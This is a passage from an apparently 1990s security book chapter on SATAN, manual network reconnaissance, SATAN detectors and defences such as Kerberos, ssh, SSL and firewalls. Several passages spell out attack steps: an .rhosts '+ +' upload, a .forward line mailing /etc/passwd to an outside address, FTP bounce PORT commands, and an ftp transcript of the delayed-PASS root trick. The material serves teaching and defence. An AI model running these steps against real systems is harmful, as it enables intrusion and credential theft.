If the target system has a weak firewall implementation, such as something that does onlyapplication-level filtering, the hacker could try to get the transport layer to send a packet intothe network by using IP forwarding.

A recent RFC, 1858, discusses a security vulnerability that could result from the fragmentationof IP packets occurring at breakpoints inside the TCP header. If a hacker is able to see suchfragmentation occurring, by packet sniffing, the hacker can try to exploit it by intercepting theconnection and spoofing portions of the TCP header. The hacker might even be able to causesuch fragmentation on intermediate routers by heavily loading them down with traffic at theappropriate time.

X11 InformationAn improperly configured X Windows server is a major vulnerability. If the user executesxhost +, that user has disable access control to the X Windows server, permitting any remoteuser to gain control over it. By using an XOpenDisplay() call to the target system, a hacker canidentify if access controls permit a remote user to capture control over it. SATAN claims toinclude a program called opendisplay that does this; actually, SATAN uses xhost to determinethis information. The SATAN reports indicate whether or not remote systems have X Win-dows access control.

rexd InformationIf rexd is listed in the portmap services, the target system most likely permits execution ofcommands from any remote system by using the on command. An option to rexd can requirethe remote system to be listed in the hosts.equiv file, but this option is not the default. Even ifthe remote system hostname must be listed in hosts.equiv, the security is weak. A hacker can

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try to poison a dns cache with face resource records to circumvent this security. rexd is aninherently insecure service that should be used only behind firewalls and on secure networks.SATAN includes a scan for rexd.

SNMP InformationSNMP is a server that facilitates network management by permitting remote programs, such asHP’s OpenView Network Node Manager, to gather information about hosts and routers. Thisalso permits a hacker to gather information about remote hosts and routers.

Each SNMP request includes a community name, which authenticates the access request to thesnmpd program on the target. There are two kinds of requests:

■ SNMP GetRequest. Permits the remote user, or manager, to read a system variable(MIB).

■ SNMP SetRequest. Permits the manager to alter an MIB value. An MIB correspondsto a system setting.

The standard snmpd (both v1 and v2) distribution comes from CMU and includes manyincredibly useful tools for gathering information about remote sites. SNMP applications are on

The three most useful applications are snmpget, snmpnetstat, and snmpwalk. A hacker can usesnmpget to talk directly to the snmpd on the target system, requesting information andchanging system variables (MIBs). The snmpnetstat utility can be used by a hacker to effectivelyrun netstat on the remote system. Here is an example:

% snmpnetstat -v 1 sys2 publicActive Internet ConnectionsProto Recv-Q Send-Q Local Address Foreign Address (state)tcp 0 0 ESTABLISHEDtcp 0 0 ESTABLISHED...

The snmpwalk generates a printout of vast amounts of information about the remote system,much of it related to kernel transport status.

The only authentication done by snmp v1 is that the request requires knowledge of the remotecommunity name, which is configured in the /etc/snmp.conf file. The default communityname is public.

By default, remote users cannot alter MIB values but can read all MIB values. If the snmp.conffile has a set-community-name setting, remote managers can do SNMP SetRequests, permit-ting them to modify the local system’s MIB values. The remote user just needs to guess thecommunity name. If the snmp.conf file has a get-community-name setting, the remote usersmust provide the community name before gaining access to MIB values.

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Although snmp v1 is useful for gaining system and routing information, the new snmp v2 hasadequate security to prevent most attacks. Even though v2 is available from the same source asv1, the vast majority of systems seem to support v1 or both v1 and v2. SATAN does scan forthe presence of snmpd, but does not interrogate the server for information.

Other Weak PointsSATAN’s port scanning may reveal the presence of gopher, uucp, talk, ntp, relay chat, andsystat services. While major vulnerabilities in these services are not popularly known, theirpresence may be useful as new vulnerabilities are discovered. SATAN only scans for thepresence of these services; SATAN does not attempt to gather more information or search forvulnerabilities in these services. Although uucp used to be very helpful for attacking systems, itsusage has dropped considerably. An interesting uucp hole is one where many sendmail aliasesincluded a uudecode alias that would automatically invoke the uudecode command on anincoming mail message.

Similarly, gopher’s popularity has declined dramatically as the popularity of the World WideWeb has gained. Most gopherd also provide access controls that can screen out undesiredconnections.

talk is still a useful attack point, because it permits a remote user to write to a user’s tty,perhaps invoking commands and actions. ntp can be used to modify a system’s time, but this ismore a denial of service attack than a useful vulnerability. relay chat is interesting, but it offerslittle for attack and will certainly waste your time. relay chat can help you to build up adatabase of users and system names. Finally, systat is rarely seen but remains a great source ofinformation when it is present.

Completion of the Manual ScanAt this point, the hacker has completed manually scanning the remote system for potentialphase one vulnerabilities. This corresponds to the completion of a SATAN scan. Whereas thehacker took perhaps four hours to complete the above scans against a single host, SATANcould easily run the same scans against that host in seconds. In addition, SATAN wouldgenerate reports and databases of additional hosts to scan in the future. It is important for asystem administrator to realize the manual approach to phase one attacks: SATAN onlyincludes a subset of the possible scans, as mentioned throughout the preceding manual scandemonstration. A vigilant system administrator should consider adding additional scans toSATAN to cover all possible vulnerabilities.

Know the CodeThe best way to know possible vulnerabilities is to study the code of Internet services. Mostvendor code is based on publicly available source, from BSD, ATT, Sun, or private locations.Hackers get this source and study it for clues.

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The Linux distributions are extremely helpful in understanding the operation of most pro-grams. Even the latest and greatest code from vendors typically has comparable Linux sourcecode. For example, NIS+ from Sun has a cousin in Linux called NYS. One popular Linux FTPsite is

The BSD44 distribution is available on CD-ROM from many bookstores now and is useful inunderstanding the transport layer implementation as well as many of the standard services,such as rlogin or inetd.

Some of the most popular private distributions follow:

■ sendmail:

■ bind:

■ wu-ftpd:

■ httpd:

■ firewall kit:

Try All Known ProblemsProblems are not all fixed simultaneously. One vendor might fix one problem on one platform,but the other platforms from that vendor won’t be fixed until later, and platforms from othervendors won’t be fixed for quite some time later. So hackers reverse-engineer patches, searchfor security implications of those patches, and test all of’s systems for these holes.One major vendor estimated that many security patches are reverse-engineered within a day ofrelease—sometimes within hours.

Some Unix problems are re-opened in new releases, or are never really closed. Hackers buildup a catalog of problems and try them on new platforms, products, and releases. Has there everbeen a new Unix OS release that didn’t have at least one set-uid root script?

The hacker has gathered quite a bit of information on the remote systems in’sdomain. At this point, an hacker should be able to identify some weaknesses—a system thatoffers unrestricted NFS exports or X Windows server access, for example.

Match Vulnerabilities with OpportunitiesAfter building up a database of existing and past security holes, and then building up adatabase of a target organization’s systems and configurations, the hacker can now try to cross-correlate opportunities and take advantage of them.

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As an example, any weaknesses in sendmail, due to old versions or configuration mistakes,might permit the sending of the /etc/passwd file. A copy of the real passwd file could be in theanonymous FTP ˜ftp/etc directory. An accessible X Windows system can allow a hacker to takecontrol of the target. An NIS server or client can offer access to system maps. An NFS servercan offer access to file systems. The presence of a tftpd, and the knowledge of the file systemfor the system type, might permit the uploading of a corrupt configuration or boot file ontothe boot server. The tftpd might permit the downloading of files from any directory. The ftpdmight allow an intruder to put an .rhosts into the ˜ftp directory. A new system might not havepasswords for all accounts.

Look for Weak LinksIf the network scans don’t reveal any vulnerabilities, the hacker may need to resort to non-network attacks.

The hacker might try a “Wargames” or “war dialer” type of dialing attack to determine modemaddresses for the site. The hacker uses a modem to call every single phone extension in anorganization until the hacker discovers all modems connected to phone lines. Two popular wardialer programs are “ton loc” and “phone tag.” If the site permits dial-in access, this could leadto an intrusion.

The hacker might try to get physical access to the network, with some sort of site tap. Thehacker might try to use people inside the organization, or former employees, to gain informa-tion or access. A hacker could interview for a job in the organization, gain some free timeduring the interview, walk up to a system on the site, and open a hole.

Summarize the Remote Network AttackTo summarize, the first phase of an attack is to get a login and password on the target systems.This first phase consists of two parts, building up a list of security holes and a database ofinformation on the target. By matching the vulnerability with the opportunity, the hacker cangain access.

Automate the SearchDoing a search by hand is tedious and slow, considering that automation is easy with acomputer system. One should seriously consider automating the search for network vulner-abilities. SATAN can be used to automate this search.

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The First Meeting with SATAN“Soon will rise up what I expect;and what you are trying to imagine nowsoon must reveal itself before your eyes.”

—Dante Alighieri, Inferno, Canto XVI, lines 121–123

SATAN is an automated network vulnerability search and report tool that provides anexcellent framework for expansion. The authors indicate that SATAN stands for “SecurityAnalysis Tool for Auditing Networks.”

Although a form of the SATAN program can be run from the Unix command line, SATAN isprimarily intended to be run through a Web browser. Users indicate a target host or network,along with proximity search levels and search depth, and initiate a search. SATAN gathers asmuch information as possible about these targets and can search nearby hosts, as guided by theproximity rules. (Proximity rules are fully explained later in this chapter. Basically, if a scan ofa target system reveals other host names, such as that target’s DNS server, SATAN willconsider those hosts to be on a proximity of “1” to the target. SATAN can be configured tomake scans of the target and all hosts that are a certain proximity level away from that target.)It then adds search information into a standardized database that it uses for a variety of reports.

SATAN consists of a small PERL kernel, along with a number of C programs that do vulner-ability checks, and a large number of PERL support programs that control the searches, storeresults to database files, generate reports, and emit HTML forms. Along with theseexecutables, a large number of pre-prepared HTML documents and tutorials are included.

HistoryThe two authors of SATAN, Wietse Venema and Dan Farmer, have had a long history ofassociation with network security. According to the doc/design.html Web page in theirSATAN distribution, some of the design goals of SATAN were as follows:

■ Investigate mapping of the security of large networks

■ Use the traditional Unix toolbox approach of program design

■ Make the product freely available

■ Discover as much network information as possible without being destructive

■ Create the best investigative security network tool

Although early versions of SATAN were already available in late 1993, the advent of Webbrowsers in 1994 seemed to be the big turning point for the direction of the program. By early

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1995, the program was already being beta-sited by many people. The creators choose April 5,1995, Dan Farmer’s birthday, to release SATAN to the world.

The initial publicity over SATAN began in February, 1995, as the mass media took interest inthe program. This could have been due to the media’s continuing interest in network security,the unique name of the program, or the flamboyance of one of the creators.

The New York Times wrote, “It discovers vulnerabilities for which we have no solutions.” TheLos Angeles Times warned, “SATAN is like a gun, and this is like handing a gun to a 12-year-old.” TV stations (KTVU Channel 2 Oakland) showed five-minute reports on the topic,including interviews with the creators. The San Francisco Chronicle had photos of Dan Farmer,along with the story.

Vendors were flooded by requests for protection, and security bulletins were quickly released,along with patches. The program was distributed by dozens of FTP sites to thousands of users.Protection programs, which enabled users to see if they had been visited by SATAN, werequickly announced and distributed.

Quite quickly, a security hole was found in SATAN, resulting in a revision and redistributionof the program.

Despite claims that SATAN would result in massive criminal activity, the hopes and expecta-tions of the authors were realized. SATAN did not appear to greatly increase the number ofintrusions, but it did lead to a strengthening of network security by causing vendors to releasepatches and users to inspect and tighten up their system security.

Unfortunately, few additional vulnerability searches have been added to SATAN since theinitial release, at least to the SATAN distributions available from the primary FTP archives.Individual users have added such probes but are perhaps not forwarding these additions backto the major distributions.

The CreatorsWietse Venema released SATAN while working for the Eindhoven University of Technologyin the Netherlands. He has written many useful security tools, such as tcp_wrappers, a secureportmap program, a secure rpcbind program, logdaemon, which improves logging andauditing, as well as SATAN. He also coauthored the influential paper “Improving the Securityof Your Site by Breaking Into It” with Dan Farmer (Farmer & Venema, 1993). A complete listof his papers and tools is available via

Dan Farmer, along with Gene Spafford at Purdue University, helped to create the COPSsecurity program. As a result of SATAN’s release, he was interviewed on TV and quoted inquite a few newspapers and magazines. His home page says that his girlfriend, Muffy, chosethe name SATAN. His home page is at

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Comparison to Other ToolsSATAN was not the first program to look for network vulnerabilities. ISS does a similar scanand claims to look for more vulnerabilities than any other program—200 at the time of thiswriting. Unlike SATAN, the latest ISS is not free, but is instead a commercial product thatdoes not include source code. See for more information. An older, but free,version of ISS is available, along with a patch for bug fixes, from

Fremont, a freely available program, does a scan of hosts and attempts to build a map ofsystems. However, it does not search for network vulnerabilities. It is available from

Vendor ReactionsSATAN had the effect that the creators may have secretly desired. It increased customerinterest in network security, causing vendors to release bulletins and patches if they weren’talready doing so. Such public disclosure of holes is risky, however; users who are unaware ofworkarounds or patches may be vulnerable to holes for some time, whereas intruders have beenalerted to them.

The creators of SATAN provided advance copies of the programs to vendors to help themprepare for its release. All the major vendors released extremely detailed bulletins in response toSATAN, some before SATAN’s release and the rest within weeks after SATAN’s release. Thesebulletins listed patches that addressed most of the vulnerabilities searched for by SATAN thatwere code problems. The bulletins also indicated configuration recommendations and adviceon the trade-offs between running some products (finger) and the risk involved.

Note The CIAC Web site includes links to most vendor bulletins regarding SATAN. See

Long-Term ImpactSATAN has increased public awareness of many Internet security vulnerabilities and improvedresponsiveness by vendors, perhaps by alerting vendor management to the high-profile natureof this area.

Surprisingly, few stories of intrusions as a result of SATAN have been publicized. It is possiblethat these intrusions are just not being detected, because many attacks go unnoticed. For HP,the SATAN advisory continues to be requested every week, making it the most popularsecurity bulletin ever published, with perhaps 10,000 copies distributed.

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It is likely that SATAN will continue to gather additional vulnerability checks, although fewhave been added so far. SATAN does provide a flexible architecture for adding such checks, aneasy way to intelligently scan many hosts, as well as a nice reporting mechanism and databaseformat.

Detecting SATANThere are several network monitoring programs for your Unix system. The most popularSATAN detection program is Courtney, but the others listed here are also quite useful.

CourtneyThe Courtney program detects whether a system has been scanned by SATAN, or any otherport scanner such as ISS, and notifies the administrator of this probe. The program is a shortPERL script that uses the tcpdump packet sniffer library (libpcap) to monitor all networktraffic to a system. When the system encounters a SATAN-like rapid sequence of connectionattempts to many UDP and TCP ports, Courtney assumes that this has been generated by aport scanner such as SATAN.

Courtney requires the tcpdump libpcap library, which uses the systems LAN in promiscuousmode, something that not all systems support. Courtney was created by the CIAC in directresponse to SATAN’s release and is available via the CIAC Web site at

GabrielInstead of a PERL script, Gabriel is a binary, built from C source, that offers similar function-ality, but without requiring the tcpdump libpcap library. Gabriel, however, runs only on Sunplatforms. It is freely available from along with information onjoining a mailing list of Gabriel users.

TCP WrappersThe TCP wrapper program can be used to log attempts to connect to network services.Because SATAN’s UDP and TCP scans do exactly this, the TCP wrapper logs can indicate aSATAN scan. In addition to the TCP_wrappers program, some inetd programs, and xinetd,include TCP wrapper functionality.

In addition to logging attempts, these programs also provide some control over incomingrequests. tcp_wrappers can be used to permit (/etc/hosts.allow) or deny (/etc/hosts.deny)access based on the remote IP address and the owner of the remote connection. Both of theserestrictions can be circumvented: IP spoofing is possible, and modification of the remotesystem’s identd is straightforward. Many inetd programs use inetd.sec to provide the samecontrol.

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Xinetd provides this functionality and adds control over the time of the connection attempt.Xinetd also adds additional logging information, including remote user ID, access times(including exit time and exit status), and service-specific information. Xinetd also permitsaccess control over every UDP packet instead of just the initial one.

■ The address for TCP_wrappers is

■ The address for Xinetd is

netlog/TAMUThe netlog program logs TCP and UDP traffic, using the promiscuous mode of the networkinterface (either by the /dev/nit device or streams dlpi). Although intended for Sun systems,netlog should be able to be ported to any system that offers similar functionality. netlog is aproduct of Texas A&M University and is available from

ArgusCMU’s SEI group, closely associated with CERT, offers an IP network transaction manage-ment and monitoring program called Argus. Argus is available from along with libpcap and other required programs.

Using Secure Network ProgramsYou are now aware of the following:

■ The details of the first phase of a network attack

■ How SATAN is used to mount these attacks

■ The resources available for dealing with network vulnerabilities

■ The network monitoring tools that can detect attacks.

It might be worthwhile to investigate ways of improving the overall security of Unix network-ing. Although minor changes to existing network services can minimize vulnerabilities, majorchanges are frequently required to deal with inherent problems of the Internet.

KerberosPhase one network attacks attempt to gain unauthorized access from a remote system. SATANsearches for phase one vulnerabilities that permit unauthorized access. One way of improving

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authorization over a network is using Kerberos. By using Kerberos, a system is no longervulnerable to .rhosts attacks or password sniffers. SATAN is still useful against Kerberizedenvironments, however, by helping remote hackers to identify KDCs. If the hacker cansucceed in breaking into a KDC system, all the hosts that use that KDC will be vulnerable.

The primary problem with Internet security today is that the passwords of users go across thenetwork in the clear, and authentication is based solely on the IP address and password.Therefore, a hacker can, by using packet sniffing, capture the password and then impersonatethe IP address, gaining access to a remote system.

MIT developed a system called Kerberos that uses the DES algorithm to encrypt networkconnections and provide for authentication. Described in RFC 1510, the Kerberos environ-ment depends on the presence of a key server (KDC) that keeps a database of all the keys ofeach client. Each network service is modified to use authentication based on tickets that arehanded out by the KDC in response to requests by network clients.

For example, each morning, a user logs in to a workstation by running a kinit program andtyping a password. This generates a request from the workstation to the KDC for a ticket-granting ticket (TGT) that is good for the rest of the day. Now, when the user wants to telnetto a remote system, the telnet client uses the TGT to request a ticket from the KDC to gainaccess to the remote system. The ticket contains a session key that is then used by both thetelnet client and server to encrypt the connection.

A network packet sniffer is unable to hijack the connection or impersonate either the client orthe server. Kerberos uses the 56-bit DES algorithm to encrypt packets. This code cannot beexported outside the U.S., but versions of it are widely available internationally. Although 56bits sounds strong, it isn’t that strong, and brute force attacks can decrypt packets.

Although Kerberos solves the problem of connection hijack and impersonation, it addscomplexity to the administration of the environment. The system admin must now maintainKDCs to support the network. If the KDCs go down or become unreachable, the users areunable to use the network. If the KDCs are violated, the security of the entire network hasbeen destroyed. Finally, the maintenance of the Kerberos configuration files is somewhatcomplex and frequently time-consuming. Some Kerberos implementations are unsecure onmultiuser systems. From a SATAN standpoint, one might want to identify remote hosts thatoffer KDC servers and focus attacks on these systems. Imagine if the KDC ran NFS; thehacker could use NFS-based attacks to gain access to that system, permitting the hacker to gainaccess to all systems that trusted that KDC.

Kerberos is available to U.S. sites from MIT, but a free, precompiled version of the MIT codeis available from Cygnus Corporation at Other vendors, such asCybersafe, offer commercial Kerberos implementations.

Note For detailed information on Kerberos, see Chapter 9.

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Secure Shell (ssh)SATAN searches for phase one vulnerabilities. Another way of dealing with such vulnerabilitiesis the recently introduced Secure Shell, or ssh, program. A replacement for rlogin, remsh, andrcp, ssh doesn’t require the overhead of Kerberos (users don’t have to kinit, and the systemadministrators do not need to maintain KDCs) and offers higher levels of cryptographicssecurity. In addition, it can be used to improve X Windows security.

ssh protects against IP spoofing, IP source routing, DNS spoofing, corruption of data in aconnection, and X authentication attacks.

The latest version of the ssh FAQ is available from˜ig25/ssh-

faq/. The program itself is available from

SSLYet another way of dealing with phase one vulnerabilities, the vulnerabilities that SATAN isdesigned to locate, is SSL. Introduced originally to provide security for Web browsers byencrypting http connections, SSL, or the Secure Socket Library, has gained quite a followingover the past year as a vehicle to provide security for general Internet services. A draft RFCdescribes version 3 of the protocol, enabling anyone to implement daemons, although licensingfor the public key technology is still required.

SSL uses public key technology to negotiate a session key and crypto algorithm between aclient and server. The public key is stored in an X.509 certificate that bears a digital signaturefrom a trusted third party, such as RSA Corporation.

SSL moves the details of encryption and authentication into the socket library calls, makingimplementation of Internet programs much easier. The SSL calls directly parallel standardsocket library calls. Compared to making a Kerberos server, making an SSL server is vastlysimpler.

From a user standpoint, SSL no longer requires the active participation of a KDC, because thedigital signature takes place offline. So the network connection is a two-party transaction,rather than a three-party transaction. Both the client and server can be authenticated, althoughcurrent Netscape client browsers are using only server authentication. The SSL protocolnegotiates a crypto algorithm at the beginning of a connection; DES, triple-DES, IDEA, RC4,and RC2, along with md5 hashes, are advertised in common implementations. To meet U.S.export restrictions, SSL implementations shipped out of the U.S. can advertise only RC4-40,which uses 40-bit keys.

Two publicly available implementations of SSL libraries are popular: SSLref and SSLeay.SSLref, a product of Netscape Corporation, is free for non-profit uses and can be licensed forcommercial purposes. It requires the RSAref library from RSA Corporation. SSLeay is a public

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domain version of SSL that includes implementations of the RSA algorithms over which RSACorporation claims legal ownership in the U.S.

Multiple versions of telnet, FTP, http, Mosaic, and rdist have been implemented using SSLand are available from the SSLeay archives. The addresses follow:

■ SSLref Source:

■ SSLeay Source:˜ftp/Crypto/

■ RSA Source:

■ VeriSign:

■ SSL RFC Draft.

FirewallsSATAN is primarily intended for remote scanning of systems connected to the Internet. Thevast majority of such systems are firewall systems, rather than just standard Unix workstations.

A firewall system is one that connects an internal network to the Internet. Every organizationshould connect to the Web only through carefully maintained firewall systems. By reducingthe number of systems directly on the Internet to a limited number that are under the scrutinyof administrators, the level of vulnerability can be minimized. Each of these firewalls shouldprevent vulnerable services, such as NFS, NIS, or fingerd, from being offered to Internet sites.The DNS configuration on the firewall system should minimize the amount of informationavailable to external users. In general, firewalls should minimize the amount of “informationleakage” from the internal network to external sites.

Modifying a company network to use firewalls is a complex task that requires time andconsideration. TIS offers a public domain firewall that includes S/Key support. CERT has apaper on packet filtering that can assist you in configuring a firewall. You can subscribe to afirewalls mailing list by sending subscribe firewalls to [emailprotected]. Thebibliography lists several references on the topic. Other papers on the topic are available viathe COAST and CERT archives.

One impact on users of implementing a firewall is access to the external Internet. Somefirewalls permit telnet or FTP connections to cross the firewall by requiring an additionalpassword for the firewall; some use S/Key; and some use SecurID smart cards. Other firewallsuse socks proxy servers that require the client services to be modified.

The importance of properly configuring a firewall, applying patches in a timely manner, andlimiting the amount of services available to Internet users cannot be overestimated. If SATANis used by a hacker against your organization, SATAN will be used to scan the firewall systems.

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The addresses follow:

■ TIS firewall:

■ CERT packet filtering paper:

■ S/Key source:

Note For more information on firewalls, see Chapter 7.

sockssocks is an IP encapsulation technique that permits TCP connections to use a proxy server tocomplete a connection. It permits users to conveniently use Internet services across a gatewaywithout being aware that a gateway is being crossed. socksd is frequently used to turn a Unixworkstation that has a Internet connection as well as an internal company network connectioninto a firewall system. As a result, SATAN’s scan of target firewall systems will frequentlyindicate the presence of a socksd. While no vulnerabilities are currently known to exist insocksd, if properly configured, SATAN’s discovery of socksd can indicate that the system is notjust a host connected to the Internet, but a firewall.

Normally, a telnet from host A to host B does a connect() directly between the two IP ad-dresses using the standard transport routing tables. When telnet is socksified, telnet first checkswhether the destination host B address is directly accessible. If it is, it follows that standardconnection process. If it is not, it references two environment variables, SOCKS_NS andSOCKS_SERVER, to help it first resolve the domain name into an IP address, and then toidentify the IP address of the server running the socksd proxy server. It then encapsulates theTCP packets according to the socks protocol and sends them to the socks server, which runson a gateway system and has direct connectivity to the destination system. The socks serveropens up a connection and begins to act as an intermediate hop in the connection.

If your firewall configuration supports a socks server, you must have socksified clients to takeadvantage of this service. (An HP-UX–specific socks includes a socksify program that enablesyou to convert binary versions of network programs.)

The addresses follow:

■ socks:

■ socks home page:

■ HP-UX socks:

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Investigating What SATAN Does“Now we must turn asidea little from our path, in the directionof the malignant beast that lies in wait.”

—Dante Alighieri, Inferno, Canto XVII, lines 27–29

This section describes the exact details of the network holes uncovered by SATAN, as well asholes that are common.

SATAN’s Information GatheringSATAN scans the target system for active listeners on various UDP and TCP ports. Thenumber of ports scanned depends on the type of scanned specified: light, normal, or heavy.

Light ScansThe light scan does not do a generic UDP or TCP scan; it starts with the following three scans:dns, rpc portmap, and if the portmapper shows mountd services, a showmount scan.

The dns scan uses nslookup to gather as much information as possible about the target host,including MX records and authoritative name servers for that host.

The rpc scan asks the target portmap for a list of services. It then scans this list, looking for thefollowing services: rexd, arm, bootparam, ypserv, ypbind, selection_svc, nfs, mountd, rusersd,netinfobind, and admind.

If mountd is present, SATAN runs a showmount scan. The showmount scan first asks the targetmountd to list what file systems are exported and what hosts are permitted to mount them (viathe showmount -e command). The scan then asks the target mountd to list what hosts actuallymount file systems, and to list those mounted file systems (via the showmount -a command).

Normal ScansThe normal scan does everything included in the light scan and adds scans of fingerd, variousTCP services, and UDP services. Depending on the results, and the rules database, it option-ally scans rusers, bootparam, and yp.

If the target is, the finger scan tries to finger -l the, [emailprotected],, [emailprotected],[emailprotected], and [emailprotected].

Next, SATAN does a TCP scan to see whether services are actively listening on ports forgopher, http, FTP, telnet, smtp, nntp, uucp, and X. SATAN then scans UDP ports for dnsand xdmcp.

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If the portmap program reports that rusersd is available, SATAN then contacts rusersd andreports what users are logged in to the target and from what systems.

SATAN now tries to contact the rpc bootparam service to get the NIS domain name. It uses alist of client names based on hosts that show up in the NFS exports list from mountd.

If SATAN gets the domain name, it then runs a yp-chk program to try to get thepasswd.byname map from the NIS server.

Heavy ScansThe heavy scan includes everything from the light and normal scans and adds a much largersearch for active services. The TCP scan runs from port 1 to port 9999. (A comment indicates that a very heavy scan might want to run to 65535 instead of 9999.) TheUDP scan runs from 1 to 2050 and from 32767 to 33500.

Finally, a heavy scan checks the remaining rules to see if any of the .satan scripts need to berun, based on the results of the previous port scans. For example, the ftp and rsh scripts areexecuted if these services are available.

Vulnerabilities that SATAN InvestigatesSATAN includes checks for a number of common security vulnerabilities.

ftpdSATAN checks to see whether the remote host offers anonymous FTP access. If it does, itchecks to see if the ˜ftp directory is writeable by the anonymous user. SATAN checks thebanner line of the ftpd prompt to see if it is an old version of wu-ftpd.

The SATAN documentation explains how these checks correlate to known vulnerabilities. Thedocumentation also gives an example of another security hole in ftpd—the possibility of adelayed PASS statement—but it does not actively look for this hole. The documentation alsomentions that the ˜ftp/etc/passwd file is a useful item, but SATAN does not attempt to retrievethis.

Let’s investigate each of these ftpd issues. First, the presence of anonymous FTP is not asecurity hole in itself. It does provide you with access to the remote system, which can enableyou to probe for other holes.

A hacker with access to the ˜ftp directory can upload an .rhosts file, perhaps containing + +, topermit access from any remote system. The hacker can then rlogin to the system using the FTPlogin account and gain access without typing a password. This can be prevented by indicatinga shell of /bin/false in the /etc/passwd entry for FTP.

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A hacker could upload a .forward file containing a command, such as |/bin/[emailprotected] < /etc/passwd, into the ˜ftp directory. The hacker would just mail amessage to FTP at the target site, causing the mail to be forwarded, as instructed, to theprogram that gets executed. The hacker can then use Crack to attack the passwords on thesystem.

SATAN does not look for writeable ˜ftp/etc or ˜ftp/bin directories, although it probablyshould. A system using ftpd with sublogins depends on ˜ftp/etc/passwd for permitting access tousers. If an anonymous user can modify this file, that user can gain access to subdirectoriescontaining files from other users. Similarly, modification to utilities such as bin/ls or bin/shcan offer the intruder opportunity for attacks.

For example, imagine if the /bin/ls command were modified to fake a reason for a newpassword prompt. Some unsuspecting users might retype their password to this bogus prompt,and the modified /bin/ls could store this information. Because many ˜ftp/etc/passwd files havethe same information as the /etc/passwd, this could give the hacker a real login.

The wu-ftpd program had two vulnerabilities, CERT CA-93:06 and CA-94:07, that permittedremote users to gain access to the system. First, a race condition in the code permitted users tolog in as root. Second, the SITE EXEC command permitted users to execute commands asroot. Both of these problems have been fixed in recent versions of wu-ftpd.

The presence of an ˜ftp/etc/passwd file with encrypted fields is another potential security hole.As mentioned earlier, the ˜ftp/etc/passwd file is mainly used to map file uids to login names fordirectory listings, a service in which encrypted fields are not needed and can be commentedout by replacing them with an *. For those ftpds that use sublogins, the encrypted fields areused for authentication.

However, these fields do not have to correspond to the /etc/passwd fields. Users should berequired to have different passwords for anonymous sublogins and normal system logins. Thisis because a hacker will immediately run Crack against the ˜ftp/etc/passwd file entries. SATANdoes not get the ˜ftp/etc/passwd file.

The previously mentioned ftpd server bounce problem is also not probed by SATAN. Thisproblem could be checked by trying a PORT command with an IP address different than theoriginating source, or with a privileged TCP port number on the originating source. Forexample, if the hacker used FTP on a system with IP address, the hacker would specifyPORT 1,2,3,4,0,25 to spoof e-mail onto his or her own system, or PORT 2,3,4,5,0,21 tospoof the IP address to the FTP port of the system at IP address A fixed ftpd wouldnot permit either action.

The delayed PASS command problem is documented in the SATAN white paper but is notinvestigated by SATAN because it represents a more active intrusion instead of a passive probe.As mentioned in the white paper, a remote user could gain root access by embedding a CWD /command between the USER and PASS commands. For example, consider this exchange:

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% ftpftp> open notreal.comConnected to notreal.com220 FTP server ready.ftp> quote user ftp331 Guest login ok, send ident as passwordftp> quote cwd ˜root530 Please login with USER and PASSftp> quote pass ftp230 Guest login ok, access restrictions apply.

At this point, the ftpd has chrooted to the / directory rather than the ˜ftp directory and hassuid to root. SATAN specifically avoided testing this because it involved an active intrusion,which is a conflict with the design goal of SATAN’s third level. An unimplemented fourthlevel of SATAN scanning, “All Out,” would probably be the right place for such a scan.

Most ftpds can be configured to prevent the login of users listed in a file called ftpusers. Froma SATAN standpoint, this does not matter as long as anonymous FTP is enabled. The wu-ftpdprogram uses a configuration file called ftpaccess that can permit a wide range of control overwhat anonymous users are allowed to do. Wu-ftpd also features another configuration filecalled ftphosts that can be used to specify hosts that are not permitted to use FTP.

Unprivileged NFS AccessUnix supports the concept of privileged ports: only programs that run as root are permitted tosend packets from TCP or UDP ports in the range of 1–1024. The assumption behind thisconcept is that only trustworthy people are able to get root privileges on any system connected tothe Internet. This is an extremely naive concept, because a hacker certainly has root access to hisor her own system, and the Internet is not so tightly governed that hackers are not able to gainaccess. To add to this poor assumption, PCs do not typically support the concept of privileges,and they are connected to the Internet. This means that anyone on a PC can run a program thatuses a privileged port.

Regardless of the naive assumption behind privileged ports, many network servers can anddo require that clients originate requests from privileged ports. For example, rlogind andremshd (rshd) require client requests to come from privileged ports. The NFS and mountdservices can be configured to require client requests to originate from privileged ports.

NFS is a stateless protocol that permits a remote user to mount a file system and then treat thatfile system as if it were local. The mount of a remote NFS file system causes the local system togenerate an rpc procedure call to the mountd program on the remote system. The rpc call asksthe mountd for a file handle. The mountd sends the file handle if the request originated from asystem listed in the export file list. The mountd determines this by doing a gethostbyaddr() callto resolve the IP address into a domain name. Once the mountd approves and sends the clienta file handle for the file system, the client can now request any file operation on that file systemby just providing the file handle as authentication, along with any desired uid and gid (theymust be valid on the remote system). This is called AUTH_UNIX authentication.

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Each file system operation done by the client user gets translated into one of 17 rpc requeststo the remote NFS server. These rpc calls are directed to the nfsd that services the nfs fileoperations via a kernel call.

The privileged port check for the mountd (rpc.mountd) is done in the user space daemonitself. The mountd must have been compiled to support this feature. For the standard portmapprogram, this check is usually done only if a variable called nfs_portmon has been defined.

The privileged port check for the nfs request is not done in the nfsd program, but rather insidethe Unix kernel. This means that the nfs_portmon variable can usually be dynamically turnedon and off using a debugger such as adb. It is most useful to have both mountd and nfs checkfor privileged port access. But remember that this is really not a vast increase in the security ofthe system.

SATAN tests unprivileged access to both the mountd service and nfs service by generatingnon-root rpc calls to both. SATAN also generates root rpc calls to both. It asks the mountd fora list of exported file systems, and it asks nfs to do an ls -l type listing of each file system.

Unrestricted NFS ExportsRunning showmount -e <remote system> prints a list of exported file systems. This list specifieswhich hosts are permitted to mount the file systems. (It corresponds to the remote system’s /etc/exports file.) The hosts can be specified explicitly by name, by netgroups, or by the wildcard everyone.

If everyone is permitted to mount the file system, the only authentication done on file access isdone on the client. The NFS server believes that the client NFS call has valid uid and gidvalues. So, if the / file system is exported with read/write permissions and with root access, anyhost on the network can mount the file system and act as root.

If no root access is permitted, any client can mount the file system and act as any user. Thequick way to do this is to su to the correct uid on the remote system, by creating the correctaccount on that system and then doing the file operation. The quicker way to do this is to useone of the many NFS hacking utilities to change the uid and gid and then call the NFS calldirectly. Some of the better utilities include nfsbug (by Leendert van Dort), nfsmenu (byBastian Baker), and nfsshell. The FTP locations of these utilities can be found by doing anArchie search.

A bug in older versions of NFS limited the size of netgroups to 256 bytes, creating a hole thatwould effectively cause the export to default to everyone. The SATAN scan could see this orthe everyone export as unrestricted NFS access and report it as a vulnerability.

